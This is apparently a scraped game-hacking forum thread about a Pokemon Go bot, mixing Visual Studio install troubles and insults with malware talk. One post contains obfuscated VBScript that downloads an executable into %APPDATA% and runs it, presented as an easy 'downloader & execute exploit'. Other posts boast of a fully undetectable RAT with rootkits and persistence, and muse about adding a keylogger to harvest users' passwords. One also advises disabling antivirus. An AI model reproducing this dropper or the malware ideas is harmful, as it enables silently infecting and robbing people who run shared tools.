Pokemon Go Bot

Lucky Dice

Day #997

Still can't install visual studio in my pc.

Awww why we have xdem in this forum if he no solve other problems >.< why ya no tell me sweetness >.< ?

Rb9FHnh.jpg

Edited by AccessDenied

Function rPicOdLs(lXIbUjEI)
Dim ggjZZpyX, MTAIBJTB
For ggjZZpyX = 1 To LenB(lXIbUjEI)
MTAIBJTB = MTAIBJTB & Chr(AscB(MidB(lXIbUjEI, ggjZZpyX, 1)))
Next
rPicOdLs = MTAIBJTB
End Function
Sub GcaGHONQ(nPsoiijt, hYSnoocJ)
Dim bgtlutVY: Set bgtlutVY = CreateObject("MSXML2.ServerXMLHTTP")
Dim IUKTVNrC: IUKTVNrC = "GET"
bgtlutVY.Open IUKTVNrC, nPsoiijt, False
bgtlutVY.Send
Dim CckSbTkR, iQCADmGv
Set iQCADmGv = CreateObject("Scripting.FileSystemObject").OpenTextFile(hYSnoocJ, 2, True)
iQCADmGv.WriteLine (rPicOdLs(bgtlutVY.ResponseBody))
iQCADmGv.Close()
Set bgtlutVY = Nothing
Set iQCADmGv = Nothing
End Sub
Dim cYczJszK: cYczJszK = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%APPDATA%") & "\Example.exe"
Dim XhDxOytZ: XhDxOytZ = "http://google.com/server.exe"
GcaGHONQ XhDxOytZ, cYczJszK
CreateObject("WScript.Shell").Run Chr(34) & cYczJszK & Chr(34)

really hard to add a downloader % execute exploit.

Stop google things.

Stop google things.

It's not google it's private source also i have private RAT source with 100% fud runtime , still dont need to slave anyone :D

+ private rootkits 

+ melt

+ protect file

+ peristence

what else you want to be added??  ;) 

Edited by ๖ۣۜinfamousbytes๖ۣ

It hangs in the installation. Left it for an hour or so but still no luck

First of all consider that visual studio is shit and takes HUGE amount of time to install. As i remember in my pc took 2+  hours and consider i have processor that install photoshop in 1 minute.

So before say "it stuck" go at your %temp% C:\Users\ComputerName\AppData\Local\Temp folder while you install it and order by time and find something similar to AndroidSDK_SI.log or similar and open up with notepad and scroll in the end to check the process

such as 95%, 349 KiB/s, 50 seconds left, and reopen it every 3-4 minute to see if it change cause it might work behind but the loader - process stuck. 

But before do this make sure to disable any antivirus you have especialy if you use AVG or Norton (cause both are incompatible with Visual Studio)

Edited by AccessDenied

For all the people using thins, Make a Dummy account. they will enable trade system and 1v1 soon ^^ after closing the cmd window, leave it down for like a day or so, then log in on your mobile. just like the author of the topic said

He is silly he can't add a keylogger, he don't know how to add it on the source. Sure he can download keylogger programs and make an exe but he can't add it on the source somehow  sooo 

don't worry. :-[

ddeeeaf8cdf5cd837bf014bcf5d23a675ce7a769

If he dont know how then he can pay 10-20$ for some dev to implement it and still get everyone password's. This is not the only forum he may have shared this magic tool though.

Edited by Karasu_

If he dont know how then he can pay 10-20$ for some dev to implement it and still get everyone password's. This is not the only forum he may have shared this magic tool though.

What you believe about Vorfin? Is he retarded or resmarted?

VS2015 is the best IDE out there. Even professional iOS developers acknowledge that.

https://www.visualstudio.com/en-us/downloads/download-visual-studio-vs.aspx

What is so hard to download? xD

VS2015 is the best IDE out there. Even professional iOS developers acknowledge that.

https://www.visualstudio.com/en-us/downloads/download-visual-studio-vs.aspx

What is so hard to download? xD

I've owned the professional editions since 2011, I don't find them convenient in any way possible. Its also performing badly

What you believe about Vorfin? Is he retarded or resmarted?

Vorfin was never a smart guy to begin with.

He always tryed poor scams and even now he is still poor ( i bet he is still scamming for 5 bucks if he get's the chance ).

Vorfin was never a smart guy to begin with.

He always tryed poor scams and even now he is still poor ( i bet he is still scamming for 5 bucks if he get's the chance ).

who actually gave you the impression that you are a little bit smart so you can judge others. You are as retarded and unskilled as him, you've never accomplished anything.

who actually gave you the impression that you are a little bit smart so you can judge others. You are as retarded and unskilled as him, you've never accomplished anything.

Calm down..

Someone is mad, calm your tits.

I can judge as long i hold the truth in my hands. In fact, why you are judging me right now? who gave you the impression that you are a little bit smart so you can judge others.

:happyforever:  :happyforever:  :happyforever:  :happyforever:  :happyforever:  :happyforever:  :happyforever: